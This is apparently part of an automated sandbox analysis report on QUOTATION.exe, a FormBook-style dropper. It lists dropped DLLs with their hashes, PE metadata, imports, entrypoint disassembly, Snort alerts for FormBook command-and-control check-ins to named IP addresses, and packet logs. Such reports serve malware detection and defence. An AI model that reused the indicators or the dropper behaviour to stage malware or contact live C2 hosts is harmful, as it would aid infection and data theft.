                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49768
                                                                                                                          Entropy (8bit):5.650496280667822
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:4vuoy1c6A2ZX8TRNH5JVbOd502zq1TntV5fljM:4vuoO3ZX8Q5jzC35NjM
                                                                                                                          MD5:BCC32F5B608C99F89508921B6333B329
                                                                                                                          SHA1:5F70BB4A3A812C399D8D2A2954C9A715574CFF61
                                                                                                                          SHA-256:5D4FF9A8E3B3CA26F53CD2CC4C557C5F2074A431B9CD029AE7F7A7B8902FA3C1
                                                                                                                          SHA-512:99C7623BCA873C75A3B804C815DF178ACC88E043A36473C785216CD26DC73F0525FE336F17F0F2C8CA6473FBD407A953D4650D093C52440D93ECF07C1440FAB6
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\System.dll, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ........... ....................................`.....................................O.......................h$.............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......P ......................`.......................................BSJB............v4.0.30319......l...$;..#~...;...R..#Strings....4.......#US.8.......#GUID...H.......#Blob............T.........3................................/......................=.....=....J=...=......V...}.....h.. ..... ..... ..J.. ..... ..... ..... ..1.. ..j.. .., AF..a.AF.....R..e..=.................;.....;.....;..)..;..1..;..9..;..A..;..I..;..Q..;..Y..;..a..;..i..;..q..;..y..;.....; ....;.....;..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\hamotzi\libdatrie-1.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):36029
                                                                                                                          Entropy (8bit):5.699900454607003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Hm5z53y6m/LHlM6GnPGUvMrsztd/sLLhF3VI:a53y6Gy6GuU5d/OhF3G
                                                                                                                          MD5:8A54723090530190EB11AFCD5B702B1B
                                                                                                                          SHA1:DFA923EC796A754BD21C4F9E504305848A4CB1B2
                                                                                                                          SHA-256:738F67F45FAA07CC387BAF390604EE4CE709CBE7C223D9A043EE06F7CB360D5B
                                                                                                                          SHA-512:E0D310458C8259112E07B153EDC86FDFF29E1B09648FED8D163D44DEB3BEE1545E7AD37BB00E9255DF6514844B21A829750848DA42F85FA77BEF376CE09750CF
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........<.....&".....R..........0..........h.....................................^........ .................................................................................`...............................(....................................................text...HP.......R..................`.P`.data........p.......V..............@.P..rdata...............X..............@.`@.pdata...............b..............@.0@.xdata...............j..............@.0@.bss.... .............................`..edata...............r..............@.0@.idata...............v..............@.0..CRT....X............~..............@.@..tls................................@.@..reloc..`...........................@.0B........................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\4995H5Jfc

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\SysWOW64\help.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 5, database pages 59, cookie 0x4f, schema 4, UTF-8, version-valid-for 5
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):122880
                                                                                                                          Entropy (8bit):1.1305327154874678
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:oLt4nKTjebGAUJp/XH9euJDvphC+KRmquPWSTVumQ6:it4nsJp/39RDhw+KRmqu+cVumQ
                                                                                                                          MD5:D331C900DDE8ACB523C51D9448205C0A
                                                                                                                          SHA1:BDB3366F54876E78F76A6244EDA7A4C302FEB91D
                                                                                                                          SHA-256:F199798DF1C37E3A8F6FFF1E208F083CF687F5C6A220DCAD42BB68F2120181CD
                                                                                                                          SHA-512:415E4F4F26D4F861063676EA786C2941DB8DB7E248E32D84595BC7D531CE19669AFDCB447BC18B0B723839984CD15269FF6E89EBCD168D8EBD0EC7AF86CC92E7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......;...........O......................................................O}...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\nsg9F21.tmp\System.dll

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\QUOTATION.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):11776
                                                                                                                          Entropy (8bit):5.854901984552606
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                                                                          MD5:0063D48AFE5A0CDC02833145667B6641
                                                                                                                          SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                                                                          SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                                                                          SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                                                                          Malicious:false
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Entropy (8bit):7.973819019229736
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:QUOTATION.exe
                                                                                                                          File size:690832
                                                                                                                          MD5:9f23ccacd955392c62b1b5d4be4ed690
                                                                                                                          SHA1:d7c9c869add707b5b41a1f11f5c82bba94eabbd7
                                                                                                                          SHA256:7b8d50ac67b2f0de5e35909025cc1a8d15f5edd18675878c7aaa31e3fe83a9fd
                                                                                                                          SHA512:6ece2c0aa30e9967a673ccd1b0aa248f0fce1bb5745458e641107962552dffeb8ea0c87d89d6e5487559db76e1c76b8f98718125afd5f7a70fa91af8c3b59c1c
                                                                                                                          SSDEEP:12288:2V5hWKql4jLy5cdg3ExKcZnY4UKwp7hVOZCbgjvwP:2V5hC4icdg1cUNEZCbgj8
                                                                                                                          TLSH:A1E42317758392D6F67B45FB5E6EA72603B32F670862828FB3E937B18874910446630F
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L......].................`..........52.......p....@

                                                                                                                          File Icon

                                                                                                                          Icon Hash:84c8c888cac88800

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x403235
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x5DF6D4E3 [Mon Dec 16 00:50:43 2019 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:e9c0657252137ac61c1eeeba4c021000

                                                                                                                          Authenticode Signature

                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:E=Radiov@Charley.Po, OU="Polyparasitic semisagittate ", O=Syndoc, L=Fervaches, S=Normandie, C=FR
                                                                                                                          Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                          Error Number:-2146762487
                                                                                                                          Not Before, Not After
                                                                                                                          • 22/04/2022 01:46:17 21/04/2025 01:46:17
                                                                                                                          Subject Chain
                                                                                                                          • E=Radiov@Charley.Po, OU="Polyparasitic semisagittate ", O=Syndoc, L=Fervaches, S=Normandie, C=FR
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:F54BEA37D1ADC4BAD2F60927632A2EC9
                                                                                                                          Thumbprint SHA-1:BF5EB77E7A91F7976F23F102B3C078DB9DAAF954
                                                                                                                          Thumbprint SHA-256:A4139CD92C018C5E22E64C59A153598DB90CDE89114105F7C95C552D2C985DB3
                                                                                                                          Serial:122A79BA407440E874A3850AF2969681469C2B80

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          sub esp, 00000184h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          xor ebx, ebx
                                                                                                                          push 00008001h
                                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                                          mov dword ptr [esp+10h], 00409198h
                                                                                                                          mov dword ptr [esp+20h], ebx
                                                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                                                          call dword ptr [004070A0h]
                                                                                                                          call dword ptr [0040709Ch]
                                                                                                                          and eax, BFFFFFFFh
                                                                                                                          cmp ax, 00000006h
                                                                                                                          mov dword ptr [0042370Ch], eax
                                                                                                                          je 00007F65ECBB9DA3h
                                                                                                                          push ebx
                                                                                                                          call 00007F65ECBBCE8Bh
                                                                                                                          cmp eax, ebx
                                                                                                                          je 00007F65ECBB9D99h
                                                                                                                          push 00000C00h
                                                                                                                          call eax
                                                                                                                          mov esi, 00407298h
                                                                                                                          push esi
                                                                                                                          call 00007F65ECBBCE07h
                                                                                                                          push esi
                                                                                                                          call dword ptr [00407098h]
                                                                                                                          lea esi, dword ptr [esi+eax+01h]
                                                                                                                          cmp byte ptr [esi], bl
                                                                                                                          jne 00007F65ECBB9D7Dh
                                                                                                                          push 0000000Ah
                                                                                                                          call 00007F65ECBBCE5Fh
                                                                                                                          push 00000008h
                                                                                                                          call 00007F65ECBBCE58h
                                                                                                                          push 00000006h
                                                                                                                          mov dword ptr [00423704h], eax
                                                                                                                          call 00007F65ECBBCE4Ch
                                                                                                                          cmp eax, ebx
                                                                                                                          je 00007F65ECBB9DA1h
                                                                                                                          push 0000001Eh
                                                                                                                          call eax
                                                                                                                          test eax, eax
                                                                                                                          je 00007F65ECBB9D99h
                                                                                                                          or byte ptr [0042370Fh], 00000040h
                                                                                                                          push ebp
                                                                                                                          call dword ptr [00407040h]
                                                                                                                          push ebx
                                                                                                                          call dword ptr [00407284h]
                                                                                                                          mov dword ptr [004237D8h], eax
                                                                                                                          push ebx
                                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                                          push 00000160h
                                                                                                                          push eax
                                                                                                                          push ebx
                                                                                                                          push 0041ECC8h
                                                                                                                          call dword ptr [00407178h]
                                                                                                                          push 00409188h

                                                                                                                          Rich Headers

                                                                                                                          Programming Language:
                                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74300xa0.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x360000x4568.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0xa68a80x21e8
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x294.rdata
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x10000x5f7d0x6000False0.6680094401041666data6.466064816043304IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rdata0x70000x123e0x1400False0.4275390625data4.989734782278587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                          .data0x90000x1a8180x400False0.638671875data5.130817636118804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .ndata0x240000x120000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .rsrc0x360000x45680x4600False0.42265625data5.512282206254712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                                          RT_ICON0x362680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States
                                                                                                                          RT_ICON0x388100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States
                                                                                                                          RT_ICON0x398b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States
                                                                                                                          RT_DIALOG0x39d200x100dataEnglishUnited States
                                                                                                                          RT_DIALOG0x39e200x11cdataEnglishUnited States
                                                                                                                          RT_DIALOG0x39f400xc4dataEnglishUnited States
                                                                                                                          RT_DIALOG0x3a0080x60dataEnglishUnited States
                                                                                                                          RT_GROUP_ICON0x3a0680x30dataEnglishUnited States
                                                                                                                          RT_VERSION0x3a0980x190dataEnglishUnited States
                                                                                                                          RT_MANIFEST0x3a2280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetFileAttributesA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileTime, GetFileAttributesA, SetCurrentDirectoryA, MoveFileA, GetFullPathNameA, GetShortPathNameA, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, DeleteFileA, FindFirstFileA, FindNextFileA, FindClose, SetFilePointer, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, MultiByteToWideChar, FreeLibrary, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                                                                                                          USER32.dllGetSystemMenu, SetClassLongA, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, LoadImageA, CreateDialogParamA, SetTimer, SetWindowTextA, SetForegroundWindow, ShowWindow, SetWindowLongA, SendMessageTimeoutA, FindWindowExA, IsWindow, AppendMenuA, TrackPopupMenu, CreatePopupMenu, DrawTextA, EndPaint, DestroyWindow, wsprintfA, PostQuitMessage
                                                                                                                          GDI32.dllSelectObject, SetTextColor, SetBkMode, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, GetDeviceCaps, SetBkColor
                                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                                                                                                          ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                          Possible Origin

                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                          EnglishUnited States

                                                                                                                          Network Behavior

                                                                                                                          Snort IDS Alerts

                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                          192.168.11.202.57.90.1649909802031412 03/20/23-15:24:14.014424TCP2031412ET TROJAN FormBook CnC Checkin (GET)4990980192.168.11.202.57.90.16
                                                                                                                          192.168.11.20199.192.26.3549877802031449 03/20/23-15:21:09.812328TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987780192.168.11.20199.192.26.35
                                                                                                                          192.168.11.2034.117.168.23349886802031453 03/20/23-15:21:43.461874TCP2031453ET TROJAN FormBook CnC Checkin (GET)4988680192.168.11.2034.117.168.233
                                                                                                                          192.168.11.202.57.90.1649909802031453 03/20/23-15:24:14.014424TCP2031453ET TROJAN FormBook CnC Checkin (GET)4990980192.168.11.202.57.90.16
                                                                                                                          192.168.11.20199.192.26.3549877802031453 03/20/23-15:21:09.812328TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987780192.168.11.20199.192.26.35
                                                                                                                          192.168.11.2034.117.168.23349886802031449 03/20/23-15:21:43.461874TCP2031449ET TROJAN FormBook CnC Checkin (GET)4988680192.168.11.2034.117.168.233
                                                                                                                          192.168.11.2034.117.168.23349886802031412 03/20/23-15:21:43.461874TCP2031412ET TROJAN FormBook CnC Checkin (GET)4988680192.168.11.2034.117.168.233
                                                                                                                          192.168.11.202.57.90.1649909802031449 03/20/23-15:24:14.014424TCP2031449ET TROJAN FormBook CnC Checkin (GET)4990980192.168.11.202.57.90.16
                                                                                                                          192.168.11.20199.192.26.3549877802031412 03/20/23-15:21:09.812328TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987780192.168.11.20199.192.26.35

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Mar 20, 2023 15:18:02.619071007 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:02.619246006 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:02.619487047 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:02.644450903 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:02.644521952 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.012032986 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.012262106 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.114784956 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.114860058 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.115901947 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.116045952 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.119679928 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.164378881 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.361583948 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.361723900 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.361802101 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.361859083 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.361955881 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.362015963 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.537919044 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.538078070 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.538149118 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.538151026 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.538167953 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.538327932 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.538464069 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.538511992 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.538661003 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.538733959 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.621128082 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.621366978 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.621366978 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.715486050 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.715626955 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.715744972 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.715804100 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.715821028 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.715982914 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.716125965 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.716435909 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.716470957 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.716485977 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.716739893 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.754585981 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.754810095 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.754853964 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.755006075 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.755224943 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.797921896 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.798078060 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.798114061 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.798192978 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.892709970 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.892877102 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.892955065 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.893901110 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.894165039 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.894208908 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.894731998 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.894886017 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.894886971 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.894933939 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.894983053 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.894984007 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.895522118 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.895776033 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.896245003 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.896431923 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.896565914 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.897144079 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.897361040 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.897403002 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.897850990 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.898030043 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.898159981 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.898531914 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.898714066 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.898714066 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.898761988 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.898807049 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.899235010 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.899415970 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.899415970 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.899465084 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.899466038 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.932423115 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.932583094 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.932583094 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.932627916 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.932694912 CET49835443192.168.11.20162.240.73.101
                                                                                                                          Mar 20, 2023 15:18:03.932982922 CET44349835162.240.73.101192.168.11.20
                                                                                                                          Mar 20, 2023 15:18:03.933172941 CET49835443192.168.11.20162.240.73.101
